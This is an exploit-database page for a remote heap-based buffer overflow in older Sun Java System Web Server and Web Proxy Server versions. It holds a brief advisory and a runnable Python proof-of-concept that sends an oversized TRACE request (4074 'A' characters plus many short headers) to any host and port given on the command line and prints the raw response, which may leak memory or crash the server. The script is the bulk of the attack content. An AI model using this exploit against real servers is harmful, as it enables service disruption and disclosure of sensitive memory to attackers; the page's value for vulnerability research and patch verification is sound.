header-logo
Suggest Exploit
vendor:
Sun Java System Web Server
by:
7.5
CVSS
HIGH
Remote Heap-based Buffer Overflow
CWE
Product Name: Sun Java System Web Server
Affected Version From: Sun Java System Web Server 7.0 prior to 7.0 Update 8, Sun Java System Web Server 6.1 prior to 6.1 Service Pack 12, Sun Java System Web Proxy Server 4.0 prior to 4.0 Service Pack 13
Affected Version To:
Patch Exists:
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Remote Heap-based Buffer Overflow in Sun Java System Web Server

The Sun Java System Web Server is prone to a remote heap-based buffer-overflow vulnerability. Attackers can exploit this issue to crash the affected application or to obtain potentially sensitive information that may aid in further attacks.

Mitigation:

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/37648/info

Sun Java System Web Server is prone to a remote heap-based buffer-overflow vulnerability.

Attackers can exploit this issue to crash the affected application or to obtain potentially sensitive information that may aid in further attacks.

The following are vulnerable:

Sun Java System Web Server 7.0 prior to 7.0 Update 8
Sun Java System Web Server 6.1 prior to 6.1 Service Pack 12
Sun Java System Web Proxy Server 4.0 prior to 4.0 Service Pack 13 

#!/usr/bin/env python
# sun_trace.py
#
# Use this code at your own risk. Never run it against a production system.
# 
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

import socket
import sys

def send_req(host,port):
  buf="TRACE /%s HTTP/1.0\n" % ("A"*4074) 
  for i in range(0,10):
    buf += "%d"%i + ":\n"
                               
  for i in range(ord('a'), ord('z')):
    buf += chr(i) + ":\n"

  buf += "\n" 

  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sock.connect((host,port))
  sock.sendall(buf)
  resp=""
  while 1:
    s= sock.recv(4000)
    if len(s)<1: break
    resp+=s
  print list(resp)

if __name__=="__main__":
 if len(sys.argv)<3:
  print "usage: %s host port" % sys.argv[0]
  sys.exit()

 send_req(sys.argv[1],int(sys.argv[2]))